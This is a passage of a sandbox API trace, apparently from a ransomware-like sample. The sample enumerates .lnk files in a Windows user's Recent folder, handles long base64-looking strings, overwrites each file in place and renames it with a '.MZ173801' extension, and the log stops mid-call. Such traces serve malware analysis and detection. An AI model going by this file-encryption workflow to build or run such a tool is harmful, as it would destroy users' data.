lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.104] GetCurrentThreadId () returned 0x1358 [0110.104] GetCurrentThreadId () returned 0x1358 [0110.104] GetCurrentThreadId () returned 0x1358 [0110.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.105] GetCurrentThreadId () returned 0x1358 [0110.105] GetCurrentThreadId () returned 0x1358 [0110.105] GetCurrentThreadId () returned 0x1358 [0110.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o0b7l4H.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o0b7l4h.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.106] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.106] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.106] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x62a [0110.106] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.106] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x62a, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x62a, lpOverlapped=0x0) returned 1 [0110.107] CloseHandle (hObject=0x3f4) returned 1 [0110.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o0b7l4H.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o0b7l4h.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.109] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x62a, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x62a, lpOverlapped=0x0) returned 1 [0110.110] CloseHandle (hObject=0x3f4) returned 1 [0110.111] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o0b7l4H.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o0b7l4h.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\o0b7l4H.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\o0b7l4h.lnk.mz173801")) returned 1 [0110.111] GetCurrentThreadId () returned 0x1358 [0110.112] GetCurrentThreadId () returned 0x1358 [0110.112] GetCurrentThreadId () returned 0x1358 [0110.112] GetCurrentThreadId () returned 0x1358 [0110.112] GetCurrentThreadId () returned 0x1358 [0110.112] GetCurrentThreadId () returned 0x1358 [0110.112] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac4d72d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7ac4d72d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7ac4d72d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3dd, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="oA91dS68Kck7s8GQB.lnk", cAlternateFileName="OA91DS~1.LNK")) returned 1 [0110.112] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0110.112] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0110.112] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oA91dS68Kck7s8GQB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\oa91ds68kck7s8gqb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ac4d72d, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7ac4d72d, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7ac4d72d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3dd)) returned 1 [0110.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0110.113] GetCurrentThreadId () returned 0x1358 [0110.113] GetCurrentThreadId () returned 0x1358 [0110.113] GetCurrentThreadId () returned 0x1358 [0110.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0110.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0110.114] GetCurrentThreadId () returned 0x1358 [0110.114] GetCurrentThreadId () returned 0x1358 [0110.114] GetCurrentThreadId () returned 0x1358 [0110.114] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oA91dS68Kck7s8GQB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\oa91ds68kck7s8gqb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0110.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x3dd [0110.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0110.114] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x3dd, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x3dd, lpOverlapped=0x0) returned 1 [0110.115] CloseHandle (hObject=0x3f4) returned 1 [0110.116] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oA91dS68Kck7s8GQB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\oa91ds68kck7s8gqb.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0110.117] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x3dd, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x3dd, lpOverlapped=0x0) returned 1 [0110.118] CloseHandle (hObject=0x3f4) returned 1 [0110.119] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oA91dS68Kck7s8GQB.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\oa91ds68kck7s8gqb.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\oA91dS68Kck7s8GQB.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\oa91ds68kck7s8gqb.lnk.mz173801")) returned 1 [0110.120] GetCurrentThreadId () returned 0x1358 [0110.120] GetCurrentThreadId () returned 0x1358 [0110.120] GetCurrentThreadId () returned 0x1358 [0110.120] GetCurrentThreadId () returned 0x1358 [0110.120] GetCurrentThreadId () returned 0x1358 [0110.120] GetCurrentThreadId () returned 0x1358 [0110.120] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea8c05d6, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea8c05d6, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea8c05d6, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x47d, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="OBs8J_Fu4-ilYu.flv.lnk", cAlternateFileName="OBS8J_~1.LNK")) returned 1 [0110.120] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: 